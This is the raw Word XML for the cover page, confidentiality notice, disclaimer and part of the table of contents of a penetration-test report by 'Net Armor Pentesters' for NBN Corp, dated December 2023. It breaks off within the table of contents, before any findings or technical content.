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5C328" w14:textId="488D9D2F" w:rsidR="0025451F" w:rsidRDefault="0025451F" w:rsidP="00ED489E">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nova"/>
          <w:color w:val="009DDC"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A74F8C">
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nova"/>
          <w:noProof/>
          <w:color w:val="009DDC"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44949031" wp14:editId="1763C7F9">
            <wp:extent cx="4743450" cy="2952750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="929665883" name="Picture 929665883" descr="A person with a mask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69746" name="Picture 1" descr="A person with a mask on&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4744114" cy="2953163"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FECA1BC" w14:textId="20C4463D" w:rsidR="0025451F" w:rsidRDefault="0025451F" w:rsidP="0025451F">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:before="1440" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED489E">
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>Net Armor</w:t>
      </w:r>
      <w:r w:rsidR="00ED489E" w:rsidRPr="00ED489E">
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pentesters</w:t>
      </w:r>
      <w:r w:rsidRPr="00A74F8C">
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> Security Assessment Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC6E7DE" w14:textId="412B4ECF" w:rsidR="00ED489E" w:rsidRDefault="00ED489E" w:rsidP="00ED489E">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nova"/>
          <w:noProof/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1F589A4E" wp14:editId="58022E83">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>313953</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>186522</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5370662" cy="12220"/>
                <wp:effectExtent l="38100" t="38100" r="59055" b="83185"/>
                <wp:wrapNone/>
                <wp:docPr id="116339611" name="Straight Connector 1"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipV="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="5370662" cy="1222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6BF24A0">
              <v:line id="Straight Connector 1"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2pt" from="24.7pt,14.7pt" to="447.6pt,15.65pt" w14:anchorId="44E8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">
                <v:shadow on="t" color="black" opacity="24903f" offset="0,.55556mm" origin=",.5"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="540578B8" w14:textId="7400E7B2" w:rsidR="0025451F" w:rsidRPr="00A74F8C" w:rsidRDefault="00ED489E" w:rsidP="00ED489E">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED489E">
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AA859E0" wp14:editId="1DC96F09">
            <wp:extent cx="2518913" cy="1244980"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="51587967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79672" name="Picture 1" descr="A blue and black logo&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2521008" cy="1246015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0025451F" w:rsidRPr="00A74F8C">
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F5195C" w14:textId="77777777" w:rsidR="0025451F" w:rsidRDefault="0025451F" w:rsidP="0025451F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="290C8FEF" w14:textId="77777777" w:rsidR="00ED489E" w:rsidRDefault="00ED489E" w:rsidP="00ED489E">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62F8BD09" w14:textId="77777777" w:rsidR="00ED489E" w:rsidRDefault="00ED489E" w:rsidP="00ED489E">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="612FC2D5" w14:textId="11BD4ACE" w:rsidR="00ED489E" w:rsidRDefault="781D019D" w:rsidP="00ED489E">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Report Issued: 12/1</w:t>
      </w:r>
      <w:r w:rsidR="05A883B7" w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>/2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D6DAC4" w14:textId="77777777" w:rsidR="00D962D3" w:rsidRDefault="00D962D3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_6xjv2myrl730"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="21865135" w14:textId="73615A6C" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc153745185"/>
      <w:bookmarkStart w:id="2" w:name="_Toc153753301"/>
      <w:bookmarkStart w:id="3" w:name="_Toc153753374"/>
      <w:bookmarkStart w:id="4" w:name="_Toc153834515"/>
      <w:r>
        <w:t>Confidentiality Notice</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="38E62F8D" w14:textId="333AF35C" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">This report contains sensitive, privileged, and confidential information. Precautions should be taken to protect the confidentiality of the information in this document. Publication of this report may cause reputational damage to NBN Corp or facilitate attacks against NBN Corp. </w:t>
      </w:r>
      <w:r w:rsidR="00ED489E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>NetArmor Pentesters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> shall not be held liable for special, incidental, collateral or consequential damages arising out of the use of this information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BB1122" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_3aofwon93h1i"/>
      <w:bookmarkStart w:id="6" w:name="_Toc153745186"/>
      <w:bookmarkStart w:id="7" w:name="_Toc153753302"/>
      <w:bookmarkStart w:id="8" w:name="_Toc153753375"/>
      <w:bookmarkStart w:id="9" w:name="_Toc153834516"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:t>Disclaimer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="308D282F" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Note that this assessment may not disclose all vulnerabilities that are present on the systems within the scope of the engagement. This report is a summary of the findings from a “point-in-time” assessment made on NBN Corp’s environment. Any changes made to the environment during the period of testing may affect the results of the assessment. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324B5D08" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00220DD3">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="103CBA1A" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00220DD3"/>
    <w:p w14:paraId="04BC21C9" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4068C12F" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TABLE OF CONTENTS</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="420143502"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="4639C74F" w14:textId="0F4AEFCE" w:rsidR="0022617B" w:rsidRDefault="00B41A85" w:rsidP="0022617B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:ind w:left="0"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="IndexLink"/>
              <w:b/>
              <w:webHidden/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \z \o "1-9" \u \h</w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="IndexLink"/>
              <w:b/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc153834517" w:history="1">
            <w:r w:rsidR="0022617B" w:rsidRPr="00165C45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>EXECUTIVE SUMMARY</w:t>
            </w:r>
            <w:r w:rsidR="0022617B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0022617B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0022617B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153834517 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0022617B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0022617B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0022617B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="0022617B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31A00D73" w14:textId="578BE760"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18" w:history="1">
            <w:r w:rsidRPr="00165C45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Introduction</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153834518 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6430AFE5" w14:textId="314C0503"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19" w:history="1">
            <w:r w:rsidRPr="00165C45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Test Overview</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153834519 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3AD8CA18" w14:textId="64B06DDE"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0" w:history="1">
            <w:r w:rsidRPr="00165C45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Timeline</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153834520 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="29CDD5C2" w14:textId="3DEF1579"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1" w:history="1">
            <w:r w:rsidRPr="00165C45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Areas for Improvement</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153834521 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="588E418D" w14:textId="10445A12"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2" w:history="1">
            <w:r w:rsidRPr="00165C45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Scope</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153834522 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6475A266" w14:textId="7863001E"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23" w:history="1">
            <w:r w:rsidRPr="00165C45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>TESTING METHODOLOGY</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153834523 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0FE41DA4" w14:textId="7A8849A5"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4" w:history="1">
            <w:r w:rsidRPr="00165C45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Risk Classifications</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153834524 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3D51D659" w14:textId="08D52A43"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5" w:history="1">
            <w:r w:rsidRPr="00165C45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploitation Likelihood Classifications</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153834525 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0798EFE6" w14:textId="06D8A272"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6" w:history="1">
            <w:r w:rsidRPr="00165C45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Business Impact Classifications</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153834526 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1137FCAF" w14:textId="112514F7"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7" w:history="1">
            <w:r w:rsidRPr="00165C45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Remediation Difficulty Classifications</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
